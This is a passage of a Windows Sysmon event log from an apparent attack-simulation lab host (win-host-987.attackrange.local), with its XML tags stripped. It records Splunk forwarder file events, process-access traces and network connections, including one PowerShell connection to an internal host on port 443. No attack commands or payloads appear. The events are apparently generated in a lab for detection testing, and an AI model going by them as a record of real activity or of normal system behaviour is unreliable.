Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F9E2BE15084FD7B272460C52301DDC9,SHA256=5E3A9AB7B8EBC5AED93863116606ADD8844A46B712000D764217265BEDDC548D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:23.193{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F9A5292DEAF64732E474EF59E30CB46,SHA256=42E8036FC1295D8E555CF1F3AEC62B39F2293DF085F4A11489F3ED2FEF4BAE21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:24.212{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73B79A6B0B14C14E89A21466AF2C5199,SHA256=25FB9D724085245CDEECA631BE380136368F7C27B334321E31EB7860BFA3947D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:25.657{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C2BAB3747DF7943E7FCD54859812378F,SHA256=C46C73B8872149DA9A220A6A234B3B42FBDAEB8ED2115A1EB02346166F77C627,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:25.242{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0256AAB6BEECBB65F1DDA0F6C2719D9,SHA256=C43A685534AF076FC9A9C14BF528AD83A885A15AB94F2F7BBDA42DAB6307D4CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:48.186{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56840-false10.0.1.12-8000- 23542300x800000000000000035086371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:19:26.257{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC304FE88073B2ECB05AF919661061B9,SHA256=25BF192EA52911CB91D849955CE0472FC6F4FBC74575DDBE362F021C85A238BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:27.309{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82CD1D64B40EFBA4A644EA3719CD368,SHA256=FDAD8C83A7B3AAA1D22257C4B6898D6588FA7051C3475CDFB10ED7F9C77F92FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:50.616{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56841-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035086391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.990{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-5030-613A-8A90-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035086390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.988{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.988{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:19:28.988{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.987{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:19:28.987{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-5030-613A-8A90-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.987{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-5030-613A-8A90-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.971{B81B27B7-5030-613A-8A90-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035086383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.508{B81B27B7-5030-613A-8990-03000000C801}46446908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035086382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.324{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=819917F9E231C1B70CD8CA87093E77FE,SHA256=D44CE318F94563E0B9DA01D0303AA5DD8C0B436ACC16CD1511651ED0A8FE1746,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:19:28.289{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-5030-613A-8990-03000000C801}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.287{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:19:28.287{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.287{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:19:28.287{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.287{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-5030-613A-8990-03000000C801}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.286{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-5030-613A-8990-03000000C801}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.272{B81B27B7-5030-613A-8990-03000000C801}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:29.290{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=396F28D9445A6D5EAC651A1CB545E277,SHA256=729CA2425B53FCF09469627542855BF9F27BA13BD09C1DDFE5790EE5A14F493F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:19:29.289{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=367A0C9140F2AB753EBAAE89DD4E8ADC,SHA256=7E733C063BE1F972B0067AAA0AACB29EEC53D6606E2A97DBE3A4AB5184CED493,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:53.216{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56842-false10.0.1.12-8000-